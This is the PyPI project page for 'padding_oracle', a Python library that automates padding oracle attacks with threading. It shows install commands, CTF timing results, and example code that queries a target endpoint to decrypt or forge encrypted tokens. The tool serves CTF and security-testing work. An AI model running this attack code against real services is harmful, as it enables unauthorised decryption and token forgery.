Threaded padding oracle automation.
Project description
Padding Oracle Automation in Python
This script automates padding oracle attacks in Python, offering efficient and threaded execution.
Installation
You can install the script using one of these methods:
-
Via PyPI:
pip3 install -U padding_oracle
-
Directly from GitHub:
pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
Performance
The script's performance varies depending on the number of request threads. This was tested in a CTF web challenge:
Request Threads | Time Taken |
---|---|
1 | 17m 43s |
4 | 5m 23s |
16 | 1m 20s |
64 | 56s |
Usage
Decryption
When trying to decrypt a token like the one at https://example.com/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D
, this script assumes that the token is vulnerable to a padding oracle attack.
from padding_oracle import decrypt, base64_encode, base64_decode
import requests
sess = requests.Session() # Uses connection pooling
url = 'https://example.com/api/'
def oracle(ciphertext: bytes):
response = sess.get(url, params={'token': base64_encode(ciphertext)})
if 'failed' in response.text:
return False # Token decryption failed
elif 'success' in response.text:
return True
else:
raise RuntimeError('Unexpected behavior')
ciphertext = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=')
assert len(ciphertext) % 16 == 0
plaintext = decrypt(
ciphertext,
block_size=16,
oracle=oracle,
num_threads=16,
)
Encryption
Below is an example demonstrating how to encrypt arbitrary bytes. For a detailed understanding of the process, please refer to this Pull Request.
from padding_oracle import encrypt
ciphertext = encrypt(
b'YourTextHere',
block_size=16,
oracle=oracle,
num_threads=16,
)
Customized Logging
Both encrypt
and decrypt
allow user to inject a custom logger:
-
Disable Logging:
from padding_oracle import nop_logger plaintext = decrypt( ... logger=nop_logger, )
-
Selective Logging:
def logger(kind: str, message: str): if kind in ('oracle_error', 'solve_block_error'): print(f'[{kind}] {message}') plaintext = decrypt( ... logger=logger, )
Extras
The script also includes PHP-like encoding and decoding functions:
from padding_oracle.encoding import urlencode, urldecode, base64_encode, base64_decode
TODO
- Support more padding schemes
License
This script is distributed under the MIT license.
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
File details
Details for the file padding_oracle-0.4.1.tar.gz
.
File metadata
- Download URL: padding_oracle-0.4.1.tar.gz
- Upload date:
- Size: 8.5 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.2 CPython/3.9.18
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 172ff1ad292d9a9bb779bbc0c24c8c0607e028bd4fa3e8d6b7fead5983dcf6e8 |
|
MD5 | 62b77a6b933d96710e78fa51cdac4755 |
|
BLAKE2b-256 | 46f47e5ee1936f8af70b8368e87da09ba97ed54a2ad6a193f5e6d3ca0e3474f0 |
File details
Details for the file padding_oracle-0.4.1-py3-none-any.whl
.
File metadata
- Download URL: padding_oracle-0.4.1-py3-none-any.whl
- Upload date:
- Size: 10.0 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.2 CPython/3.9.18
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 5642b4c016d4d424a7d5970d0c38f4dd7bfcf0cf367d02301083283167dde7fc |
|
MD5 | 4325e5e170987415fb6419b9472de9b4 |
|
BLAKE2b-256 | 21f44dd4b3d49e85f3589aeae071fa3759106b05b7c900c127f1e95e757d3b47 |